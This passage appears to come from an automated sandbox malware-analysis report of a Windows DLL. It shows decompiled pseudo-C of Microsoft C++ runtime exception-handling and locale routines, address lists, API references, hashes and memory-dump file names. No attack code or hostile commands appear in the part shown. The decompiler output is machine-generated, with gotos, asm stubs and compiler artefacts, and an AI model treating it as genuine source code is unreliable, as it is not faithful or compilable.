												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6DA5C463(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6DA5C463(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6DA5C463(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6DA5C463(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6DA5A34B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6DA5C75F(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6DA5A783(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6DA5C463(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6DA5D1EE(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6DA5C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6DA5C463(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6DA5C463(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6DA5C463(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6DA5D1EE(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6DA6122B(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6DA5CE82( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6daa4b28) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6DA5A783(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6DA5CE6A( &_v64);
											E6DA5AA9D( &_v64, 0x6da8121c);
											L63:
											 *(E6DA5C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6DA5C463(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6DA5A53E(_t279, _t319, _t274);
											E6DA5D0EE(_a8, _a16, _t305);
											_t235 = E6DA5D2AB(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6DA5D065(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6da5c7df
0x6da5c7e6
0x6da5c7e8
0x6da5c7f1
0x6da5c7f7
0x6da5c7ff
0x6da5c801
0x6da5c804
0x6da5c80a
0x6da5cb83
0x6da5cb83
0x6da5cb88
0x6da5cb8a
0x6da5cb8c
0x6da5cb8f
0x6da5cb90
0x6da5cb93
0x6da5cb99
0x6da5ccb8
0x6da5cb9f
0x6da5cba1
0x6da5cba8
0x6da5cbab
0x6da5cbae
0x6da5cbb4
0x6da5cbb6
0x6da5cbbb
0x6da5cbbe
0x6da5cbc0
0x6da5cbc6
0x6da5cbc8
0x6da5cbce
0x6da5cbe3
0x6da5cbe8
0x6da5cbeb
0x6da5cbed
0x6da5ccb4
0x00000000
0x6da5ccb5
0x6da5cbed
0x6da5cbce
0x6da5cbc6
0x6da5cbbe
0x6da5cbf3
0x6da5cbf6
0x6da5cbf9
0x6da5cbfc
0x6da5cbff
0x6da5cc05
0x6da5cc17
0x6da5cc1c
0x6da5cc1f
0x6da5cc22
0x6da5cc25
0x6da5cc28
0x6da5cc2b
0x6da5cc2e
0x00000000
0x00000000
0x6da5cc34
0x6da5cc34
0x6da5cc37
0x6da5cc3a
0x6da5cc49
0x6da5cc4a
0x6da5cc4a
0x6da5cc4c
0x6da5cc4f
0x00000000
0x00000000
0x6da5cc51
0x6da5cc54
0x00000000
0x00000000
0x6da5cc62
0x6da5cc64
0x6da5cc67
0x6da5cc69
0x6da5cc71
0x6da5cc71
0x6da5cc74
0x6da5cc76
0x6da5cc78
0x6da5cc94
0x6da5cc99
0x6da5cc9c
0x6da5cc9c
0x00000000
0x6da5cc74
0x6da5cc6b
0x6da5cc6f
0x00000000
0x00000000
0x00000000
0x6da5cc9f
0x6da5cca2
0x6da5cca3
0x6da5cca6
0x6da5cca9
0x6da5ccac
0x6da5ccaf
0x6da5ccaf
0x00000000
0x6da5cc3a
0x6da5ccb9
0x6da5ccbe
0x6da5ccbf
0x6da5ccc2
0x6da5ccc5
0x6da5ccc6
0x6da5ccc7
0x6da5ccc8
0x6da5cccb
0x6da5cccd
0x6da5cd45
0x6da5cd47
0x6da5cd47
0x6da5cccf
0x6da5cccf
0x6da5ccd2
0x6da5ccd5
0x00000000
0x6da5ccd7
0x6da5ccd7
0x6da5ccda
0x6da5ccdd
0x6da5cce4
0x6da5cce4
0x6da5cce7
0x6da5cce9
0x6da5cceb
0x6da5cd1d
0x6da5cd1d
0x6da5cd20
0x6da5cd27
0x6da5cd27
0x6da5cd2a
0x6da5cd2d
0x6da5cd34
0x6da5cd34
0x6da5cd37
0x6da5cd3e
0x6da5cd40
0x6da5cd40
0x6da5cd39
0x6da5cd39
0x6da5cd3c
0x00000000
0x00000000
0x6da5cd3c
0x6da5cd2f
0x6da5cd2f
0x6da5cd32
0x00000000
0x00000000
0x6da5cd32
0x6da5cd22
0x6da5cd22
0x6da5cd25
0x00000000
0x00000000
0x6da5cd25
0x6da5cd41
0x6da5cced
0x6da5cced
0x6da5cced
0x6da5ccf0
0x6da5ccf0
0x6da5ccf2
0x6da5ccf4
0x00000000
0x00000000
0x6da5ccf6
0x6da5ccf8
0x6da5cd0c
0x6da5cd0c
0x6da5ccfa
0x6da5ccfa
0x6da5ccfd
0x6da5cd00
0x00000000
0x6da5cd02
0x6da5cd02
0x6da5cd05
0x6da5cd08
0x6da5cd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5cd0a
0x6da5cd00
0x6da5cd15
0x6da5cd15
0x6da5cd17
0x00000000
0x6da5cd19
0x6da5cd19
0x6da5cd19
0x00000000
0x6da5cd17
0x6da5cd10
0x6da5cd12
0x6da5cd12
0x00000000
0x6da5cd12
0x6da5ccdf
0x6da5ccdf
0x6da5cce2
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5cce2
0x6da5ccdd
0x6da5ccd5
0x6da5cd48
0x6da5cd4c
0x6da5cd4c
0x6da5c819
0x6da5c819
0x6da5c822
0x6da5c91f
0x6da5c91f
0x6da5c922
0x00000000
0x6da5c851
0x6da5c851
0x6da5c856
0x00000000
0x6da5c85c
0x6da5c85c
0x6da5c864
0x6da5cb1d
0x6da5cb21
0x6da5c86a
0x6da5c86f
0x6da5c872
0x6da5c877
0x6da5c87e
0x6da5c883
0x00000000
0x6da5c8bb
0x6da5c8c3
0x6da5c927
0x6da5c927
0x6da5c92a
0x6da5c92d
0x6da5c92f
0x6da5c932
0x6da5c935
0x6da5c93b
0x6da5caec
0x6da5caec
0x6da5caef
0x00000000
0x6da5caf1
0x6da5caf1
0x6da5caf4
0x00000000
0x6da5cafa
0x6da5cafa
0x6da5cafd
0x6da5cb00
0x6da5cb01
0x6da5cb02
0x6da5cb05
0x6da5cb06
0x6da5cb09
0x6da5cb0a
0x6da5cb0f
0x00000000
0x6da5cb0f
0x6da5caf4
0x6da5c941
0x6da5c941
0x6da5c945
0x00000000
0x6da5c94b
0x6da5c94b
0x6da5c952
0x6da5c96a
0x6da5c96a
0x6da5c96d
0x6da5c970
0x6da5c976
0x6da5c986
0x6da5c98b
0x6da5c98e
0x6da5c991
0x6da5c994
0x6da5c997
0x6da5c99a
0x6da5c99d
0x6da5c9a3
0x6da5c9a3
0x6da5c9a6
0x6da5c9a9
0x6da5c9b8
0x6da5c9b9
0x6da5c9b9
0x6da5c9bb
0x6da5c9be
0x6da5c9c4
0x6da5c9c7
0x6da5c9cd
0x6da5c9cf
0x6da5c9d2
0x6da5c9d5
0x6da5c9de
0x6da5c9e1
0x6da5c9e3
0x6da5c9e3
0x6da5c9e6
0x6da5c9e9
0x6da5c9ec
0x6da5c9ef
0x6da5c9f2
0x6da5c9f7
0x6da5c9f8
0x6da5c9f9
0x6da5c9fa
0x6da5c9fb
0x6da5c9fe
0x6da5ca00
0x6da5ca02
0x00000000
0x6da5ca04
0x6da5ca04
0x6da5ca04
0x6da5ca07
0x6da5ca0a
0x6da5ca0c
0x6da5ca0d
0x6da5ca12
0x6da5ca15
0x6da5ca17
0x00000000
0x00000000
0x6da5ca19
0x6da5ca1a
0x6da5ca1d
0x6da5ca1f
0x00000000
0x6da5ca21
0x6da5ca21
0x6da5ca24
0x6da5ca27
0x00000000
0x6da5ca27
0x00000000
0x6da5ca1f
0x6da5ca3b
0x6da5ca41
0x6da5ca5e
0x6da5ca63
0x6da5ca63
0x6da5ca66
0x6da5ca66
0x00000000
0x6da5ca2a
0x6da5ca2a
0x6da5ca2b
0x6da5ca2e
0x6da5ca31
0x6da5ca34
0x6da5ca34
0x00000000
0x6da5ca39
0x6da5c9d5
0x6da5c9c7
0x6da5ca69
0x6da5ca6c
0x6da5ca6d
0x6da5ca70
0x6da5ca73
0x6da5ca76
0x6da5ca79
0x6da5ca79
0x6da5ca82
0x6da5ca85
0x6da5ca85
0x6da5c99d
0x6da5ca88
0x6da5ca8c
0x6da5ca8e
0x6da5ca91
0x6da5ca97
0x6da5ca97
0x6da5ca9f
0x6da5caa4
0x6da5cb12
0x6da5cb12
0x6da5cb17
0x6da5cb1b
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5caa6
0x6da5caa6
0x6da5caaa
0x6da5cabc
0x6da5cabf
0x6da5cac2
0x6da5cac4
0x6da5cadb
0x6da5cadf
0x6da5cae5
0x6da5cae6
0x6da5cae8
0x00000000
0x6da5caea
0x00000000
0x6da5caea
0x6da5cac6
0x6da5cacb
0x6da5cace
0x6da5cad3
0x6da5cad6
0x00000000
0x6da5cad6
0x6da5caac
0x6da5caaf
0x6da5cab2
0x6da5cab4
0x00000000
0x6da5cab6
0x6da5cab6
0x6da5caba
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5caba
0x6da5cab4
0x6da5caaa
0x6da5c954
0x6da5c954
0x6da5c95b
0x00000000
0x6da5c95d
0x6da5c95d
0x6da5c964
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5c964
0x6da5c95b
0x6da5c952
0x6da5c945
0x6da5c8c5
0x6da5c8cd
0x6da5c8d0
0x6da5c8d5
0x6da5c8d9
0x6da5c8dc
0x6da5c8e2
0x6da5c8e5
0x00000000
0x6da5c8e7
0x6da5c8e7
0x6da5c8ea
0x6da5c8ec
0x6da5cb22
0x6da5cb22
0x00000000
0x6da5c8f2
0x6da5c8fa
0x6da5c905
0x00000000
0x00000000
0x6da5c90e
0x6da5c911
0x6da5c912
0x6da5c915
0x6da5c917
0x00000000
0x6da5c91d
0x00000000
0x6da5c91d
0x00000000
0x6da5c917
0x6da5c8f2
0x6da5cb27
0x6da5cb27
0x6da5cb29
0x6da5cb2a
0x6da5cb31
0x6da5cb34
0x6da5cb42
0x6da5cb47
0x6da5cb4c
0x6da5cb4f
0x6da5cb54
0x6da5cb57
0x6da5cb5a
0x6da5cb5c
0x6da5cb5e
0x6da5cb5e
0x6da5cb63
0x6da5cb6f
0x6da5cb75
0x6da5cb7a
0x6da5cb7d
0x6da5cb7e
0x00000000
0x6da5cb7e
0x6da5c8e5
0x6da5c8c3
0x6da5c883
0x6da5c864
0x6da5c856
0x6da5c822

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6DA5C8DC
type_info::operator==.LIBVCRUNTIME ref: 6DA5C8FE
___TypeMatch.LIBVCRUNTIME ref: 6DA5CA0D
IsInExceptionSpec.LIBVCRUNTIME ref: 6DA5CADF
_UnwindNestedFrames.LIBCMT ref: 6DA5CB63
CallUnexpected.LIBVCRUNTIME ref: 6DA5CB7E

Strings

csm, xrefs: 6DA5C889
csm, xrefs: 6DA5C81C
csm, xrefs: 6DA5C935

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 2f016a010a3eff78136435c4d5849c90fc97e42692e418cb521576e8c846fafb
Instruction ID: 70aeac61d63a11dcdef5075556b4ef2fc817b01633fdf62f03aa647352a5f52f
Opcode Fuzzy Hash: 2f016a010a3eff78136435c4d5849c90fc97e42692e418cb521576e8c846fafb
Instruction Fuzzy Hash: FCB1787980820AEFCF05CFA4D9809AEBBB5FF04314F16455AE9116B209D731DAF1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA55A50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6DA55A50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				short _v56;
				char _v60;
				short _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v132;
				char _v148;
				intOrPtr _v220;
				signed int _v232;
				char _v240;
				signed int _v244;
				signed int _v256;
				signed int _v260;
				signed int _v272;
				intOrPtr _v280;
				signed int _v292;
				signed int _t218;
				signed int _t221;
				signed int _t224;
				signed int _t234;
				void* _t243;
				void* _t259;
				signed int _t262;
				unsigned int _t264;
				void* _t265;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				unsigned int _t285;
				void* _t286;
				signed int _t289;
				signed int _t304;
				signed int _t306;
				signed int _t307;
				unsigned int _t309;
				void* _t310;
				signed int _t324;
				signed int _t326;
				void* _t329;
				signed int _t334;
				signed int _t335;
				void* _t342;
				signed int _t347;
				signed int _t348;
				void* _t357;
				signed int _t362;
				signed int _t363;
				void* _t365;
				signed int _t367;
				signed int _t369;
				signed int* _t371;
				signed int* _t372;
				signed int* _t373;
				intOrPtr _t382;
				signed int _t388;
				signed int* _t394;
				signed int _t400;
				void* _t402;
				void* _t409;
				void* _t411;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t435;
				unsigned int _t437;
				signed int _t438;
				signed int _t449;
				signed int _t451;
				signed int _t453;
				signed int _t455;
				signed int _t456;
				intOrPtr _t457;
				signed int _t459;
				unsigned int _t460;
				signed int _t461;
				signed int _t463;
				signed int _t467;
				signed int _t468;
				signed int _t470;
				signed int _t473;
				signed int _t474;
				signed int _t476;
				unsigned int _t480;
				unsigned int _t482;
				unsigned int _t484;
				void* _t486;
				void* _t487;
				void* _t495;
				unsigned int _t498;
				void* _t499;
				unsigned int _t502;
				void* _t503;
				unsigned int _t505;
				void* _t506;
				void* _t508;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t531;

				_push(__ebx);
				_t365 = _t495;
				_t498 = (_t495 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t365 + 4));
				_t480 = _t498;
				_push(0xffffffff);
				_push(E6DA725EC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t498;
				_push(_t365);
				_t499 = _t498 - 0x58;
				_push(__esi);
				_push(__edi);
				E6DA588D6( &_v40, 0);
				_v16 = 0;
				_t429 =  *0x6daa5060; // 0x0
				_t218 =  *0x6daa5c80; // 0x0
				_v36 = _t218;
				if(_t429 == 0) {
					E6DA588D6( &_v32, _t429);
					_t531 =  *0x6daa5060 - _t429; // 0x0
					if(_t531 == 0) {
						_t362 =  *0x6daa5048; // 0x0
						_t363 = _t362 + 1;
						 *0x6daa5048 = _t363;
						 *0x6daa5060 = _t363;
					}
					E6DA5892E( &_v32);
					_t429 =  *0x6daa5060; // 0x0
				}
				_t9 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
				_t382 =  *_t9;
				if(_t429 >=  *((intOrPtr*)(_t382 + 0xc))) {
					_t449 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t449 =  *( *((intOrPtr*)(_t382 + 8)) + _t429 * 4);
					if(_t449 == 0) {
						L8:
						__eflags =  *((char*)(_t382 + 0x14));
						if( *((char*)(_t382 + 0x14)) == 0) {
							L11:
							__eflags = _t449;
							if(_t449 != 0) {
								goto L6;
							} else {
								goto L12;
							}
						} else {
							_t357 = E6DA58AB3();
							__eflags = _t429 -  *((intOrPtr*)(_t357 + 0xc));
							if(_t429 >=  *((intOrPtr*)(_t357 + 0xc))) {
								L12:
								_t221 = _v36;
								__eflags = _t221;
								if(__eflags == 0) {
									_t449 = E6DA59399(_t429, _t449, __eflags, 0x18);
									_t502 = _t499 + 4;
									_v36 = _t449;
									_t24 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
									_t224 =  *_t24;
									__eflags = _t224;
									if(_t224 == 0) {
										_t431 = 0x6da7f2c7;
									} else {
										_t431 =  *(_t224 + 0x18);
										__eflags = _t431;
										if(_t431 == 0) {
											_t26 = _t224 + 0x1c; // 0x6a108be4
											_t431 = _t26;
										}
									}
									E6DA588D6( &_v112, 0);
									_v108 = 0;
									_v104 = 0;
									_v100 = 0;
									_v96 = 0;
									_v92 = 0;
									_v88 = 0;
									_v84 = 0;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v16 = 8;
									__eflags = _t431;
									if(_t431 == 0) {
										E6DA58889("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t480);
										_t482 = _t502;
										_push(0xffffffff);
										_push(E6DA7265C);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t502;
										_t503 = _t502 - 0x3c;
										_push(_t365);
										_push(_t449);
										_push(_t431);
										E6DA588D6( &_v148, 0);
										_v132 = 0;
										_t432 =  *0x6daa5cb4; // 0x0
										_t367 =  *0x6daa5c7c; // 0x0
										__eflags = _t432;
										if(_t432 == 0) {
											E6DA588D6( &_v32, _t432);
											__eflags =  *0x6daa5cb4 - _t432; // 0x0
											if(__eflags == 0) {
												_t347 =  *0x6daa5048; // 0x0
												_t348 = _t347 + 1;
												__eflags = _t348;
												 *0x6daa5048 = _t348;
												 *0x6daa5cb4 = _t348;
											}
											E6DA5892E( &_v32);
											_t432 =  *0x6daa5cb4; // 0x0
										}
										_t388 =  *(_v8 + 4);
										__eflags = _t432 -  *((intOrPtr*)(_t388 + 0xc));
										if(_t432 >=  *((intOrPtr*)(_t388 + 0xc))) {
											_t451 = 0;
											__eflags = 0;
											goto L29;
										} else {
											_t451 =  *( *((intOrPtr*)(_t388 + 8)) + _t432 * 4);
											__eflags = _t451;
											if(_t451 == 0) {
												L29:
												__eflags =  *((char*)(_t388 + 0x14));
												if( *((char*)(_t388 + 0x14)) == 0) {
													L32:
													__eflags = _t451;
													if(_t451 != 0) {
														goto L27;
													} else {
														goto L33;
													}
												} else {
													_t342 = E6DA58AB3();
													__eflags = _t432 -  *((intOrPtr*)(_t342 + 0xc));
													if(_t432 >=  *((intOrPtr*)(_t342 + 0xc))) {
														L33:
														__eflags = _t367;
														if(__eflags == 0) {
															_t451 = E6DA59399(_t432, _t451, __eflags, 8);
															_t505 = _t503 + 4;
															_v32 = _t451;
															_t234 =  *(_v8 + 4);
															__eflags = _t234;
															if(_t234 == 0) {
																_t434 = 0x6da7f2c7;
															} else {
																_t434 =  *(_t234 + 0x18);
																__eflags = _t434;
																if(_t434 == 0) {
																	_t434 = _t234 + 0x1c;
																}
															}
															E6DA588D6( &_v88, 0);
															_v84 = 0;
															_v80 = 0;
															_v76 = 0;
															_v72 = 0;
															_v68 = 0;
															_v64 = 0;
															_v60 = 0;
															_v56 = 0;
															_v52 = 0;
															_v48 = 0;
															_v44 = 0;
															_v40 = 0;
															_v20 = 8;
															__eflags = _t434;
															if(_t434 == 0) {
																E6DA58889("bad locale name");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t482);
																_t484 = _t505;
																_push(0xffffffff);
																_push(E6DA72685);
																_push( *[fs:0x0]);
																 *[fs:0x0] = _t505;
																_t506 = _t505 - 0xc;
																_push(_t367);
																_push(_t451);
																_push(_t434);
																E6DA588D6( &_v240, 0);
																_v220 = 0;
																_t435 =  *0x6daa5cb8; // 0x0
																_t369 =  *0x6daa5c78; // 0x0
																_v232 = _t369;
																__eflags = _t435;
																if(_t435 == 0) {
																	E6DA588D6( &_v40, _t435);
																	__eflags =  *0x6daa5cb8 - _t435; // 0x0
																	if(__eflags == 0) {
																		_t334 =  *0x6daa5048; // 0x0
																		_t335 = _t334 + 1;
																		__eflags = _t335;
																		 *0x6daa5048 = _t335;
																		 *0x6daa5cb8 = _t335;
																	}
																	E6DA5892E( &_v40);
																	_t435 =  *0x6daa5cb8; // 0x0
																}
																_t394 =  *(_v12 + 4);
																__eflags = _t435 - _t394[3];
																if(_t435 >= _t394[3]) {
																	_t453 = 0;
																	__eflags = 0;
																	goto L50;
																} else {
																	_t453 =  *(_t394[2] + _t435 * 4);
																	__eflags = _t453;
																	if(_t453 != 0) {
																		L58:
																		E6DA5892E( &_v44);
																		 *[fs:0x0] = _v32;
																		return _t453;
																	} else {
																		L50:
																		__eflags = _t394[5];
																		if(_t394[5] == 0) {
																			L53:
																			__eflags = _t453;
																			if(_t453 != 0) {
																				goto L58;
																			} else {
																				goto L54;
																			}
																		} else {
																			_t329 = E6DA58AB3();
																			__eflags = _t435 -  *((intOrPtr*)(_t329 + 0xc));
																			if(_t435 >=  *((intOrPtr*)(_t329 + 0xc))) {
																				L54:
																				__eflags = _t369;
																				if(_t369 == 0) {
